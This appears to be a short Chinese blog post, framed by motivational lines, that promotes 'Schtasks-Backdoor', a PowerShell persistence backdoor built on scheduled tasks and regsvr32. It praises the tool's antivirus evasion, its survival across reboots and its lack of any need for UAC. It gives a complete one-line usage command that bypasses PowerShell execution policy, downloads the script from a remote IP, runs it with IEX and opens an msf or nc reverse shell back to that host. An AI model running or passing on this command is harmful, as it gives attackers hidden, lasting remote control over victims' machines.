当你的才华
还撑不起你的野心时
那你就应该静下心来学习
Schtasks-Backdoor
关于
一款权限维持后门PowerShell脚本
原理
schtasks+regsvr32
功能
内网维持权限方法的一种。免杀效果好,重启生效。支持msf反弹,nc反弹,客户端不会用明显异常,自定义执行命令会有弹框(可以自己修改,思路可以使用mshta),一般实战中用nc或者msf。
用法
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 8.8.8.8 -port 8081 -time 2"
此脚本优势就是不需要过uac权限。
Example(例子)
我不需要自由,只想背着她的梦
一步步向前走,她给的永远不重